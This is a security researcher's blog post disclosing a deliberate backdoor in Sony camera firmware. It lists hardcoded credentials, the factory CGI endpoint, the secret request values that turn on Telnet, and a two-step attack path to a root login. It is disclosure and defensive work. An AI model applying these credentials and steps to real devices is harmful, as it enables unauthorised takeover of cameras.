Further information about the backdoor, disclosure timeline, affected devices and updated firmware can be found in our advisory. This blog post has some highlights from the vulnerability analysis.

This advisory is the result of research that started by uploading a recent firmware update file from a Sony camera into our cloud based firmware analysis system IoT Inspector.

After a few minutes the analysis results were available. One result immediately caught our attention:

Excerpt from IoT Inspector results

So here we have two password hashes, one is for the user admin and was cracked immediately. The password is admin. This is no surprise as the default login credentials are admin:admin.

The second password hash is much more interesting, it’s for the user root and it was found in two different files: /etc/init.d/SXX_directory and /usr/local/lib/

We can use the file system browser of IoT Inspector to have a look at the SXX_directory.

Excerpt from IoT Inspector filesystem browser

It looks like this startup script (called by /sbin/init/rcS during boot) is responsible for creating and populating the file /tmp/etc/passwd (/etc/passwd is a symlink to this file). A line for the user including a password hash is added, the shell is /bin/sh. Not good!

So, what can we do if we can crack the hash? At this point we can assume that it's very likely we can login using UART pins on the PCB. This of course requires us to have physical access and to disassemble the device.

The other locations where we could possibly use the password are Telnet and SSH, but both services are not available on the device … or are they? A quick string search in the firmware's filesystem for “telnet” shows that a CGI binary called prima-factory.cgi contains this string a few times. IDA Pro to the rescue! It seems this CGI has the power to do something with Telnet:

The code in g5::cgifactory::factorySetTelnet() (in decompiled form below) is pretty straight forward. Based on input, the inetd daemon is killed or started:

The inetd daemon gets its configuration from /etc/inetd.conf and inetd.conf is set up to launch Telnet

So how can we reach this CGI functionality? The answer lies in the lighttpd binary. Lighttpd is an open source web server that was modified by Sony. Some custom code for HTTP request handling and authentication was added. Below is an excerpt from a data structure that maps the URI /command/prima-factory.cgi to the CGI in the file system. The authentication function is HandleFactory.

HandleFactory decodes the HTTP Basic Authentication header and compares it to the username/password primana:primana.

Now we have all ingredients to craft an attack that looks like this:

  1. Send HTTP requests to /command/prima-factory.cgi containing the “secret” request values cPoq2fi4cFk and zKw2hEr9 and use primana:primana for HTTP authentication. This starts the Telnet service on the device.
  2. Login using the cracked root credentials via Telnet. Note: We have not cracked the root password, but it's only a matter of time until someone will.

The user primana has access to other functionality intended for device testing or factory calibration(?). There is another user named debug with the password popeyeConnection that has access to other CGI functionality we didn't analyze further.

We believe that this backdoor was introduced by Sony developers on purpose (maybe as a way to debug the device during development or factory functional testing) and not an "unauthorized third party" like in other cases (e.g. the Juniper ScreenOS Backdoor, CVE-2015-7755).

We have asked Sony some questions regarding the nature of the backdoor, intended purpose, when it was introduced and how it was fixed, but they did not answer.

For further information regarding affected devices and patched firmware, see our advisoryIoT Inspector now comes with a plugin that detects this vulnerability.